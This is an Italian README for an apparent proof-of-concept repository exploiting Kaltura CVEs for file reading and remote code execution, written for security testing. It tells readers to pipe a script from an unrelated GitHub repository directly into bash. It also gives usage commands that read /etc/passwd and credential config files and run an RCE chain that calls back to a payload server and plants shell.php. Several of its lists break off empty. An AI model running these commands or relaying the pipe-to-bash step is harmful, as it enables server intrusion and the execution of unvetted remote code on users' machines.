
Proof-of-concept exploit per CVE-2026-19912, CVE-2026-19913 e CVE-2026-19914, che dimostrano la lettura di file e l'esecuzione remota di codice in Kaltura, destinati a test di sicurezza autorizzati e a scopo educativo.
Esegui l'ultima versione dello script di download esterno direttamente da GitHub:
bash <(curl -fsSL https://raw.githubusercontent.com/HORKimhab/collection-scripts/main/get-svn.sh)
Questo comando richiede Bash e
curl. Controlla lo script remoto prima di eseguirlo se non ti fidi della fonte.
Utilizza questo progetto solo in ambienti sicuri e autorizzati come:
Configurazione di esempio:
git clone <repository-url>
cd <repository-name>
# Il progetto usa Python, segui i passaggi seguenti
# Crea un ambiente virtuale
python -m venv venv
# Attiva l'ambiente virtuale
# macOS / Linux
source venv/bin/activate
# Windows (Git Bash / WSL)
source venv/Scripts/activate
# Installa le dipendenze
pip install -r requirements.txt
Esempio di utilizzo:
# 1. Lettura file (più affidabile, funziona come descritto nell'articolo)
python3 kaltura_poc.py fileread http://127.0.0.1 -f /etc/passwd
python3 kaltura_poc.py fileread http://127.0.0.1 \
-f /opt/kaltura/app/configurations/local.ini --try-versions
# 2. Solo il server dei payload (da usare con Burp / curl manualmente)
python3 kaltura_poc.py serve --lport 8888
# 3. Scheletro della catena completa
python3 kaltura_poc.py rce http://127.0.0.1 \
--lhost 172.17.0.1 --lport 8888 \
--payload stdclass \
--shell '../../../../../../../../var/www/html/shell.php'
Un repository per apprendere, testare e ricercare concetti di cybersecurity in ambienti controllati.
Questo repository è destinato esclusivamente alla ricerca sulla sicurezza educativa e autorizzata.
È progettato per aiutare gli utenti a conoscere:
Utilizza questo repository solo in ambienti in cui hai il permesso, come:
L'uso non autorizzato o illegale è severamente vietato.
L'autore e i collaboratori non sono responsabili per qualsiasi danno, uso improprio, problema legale o perdita causata da questo progetto.
Utilizzando questo repository, accetti che:
Questo progetto è pensato per:
Si prega di seguire le pratiche di divulgazione responsabile e di rispettare tutte le leggi applicabili.
Per divulgazione responsabile o collaborazione, contatta il manutentore del repository tramite GitHub.
Esplora la Raccolta di PoC CVE per ulteriori risorse di proof-of-concept per CVE destinate alla ricerca sulla sicurezza autorizzata e all'educazione.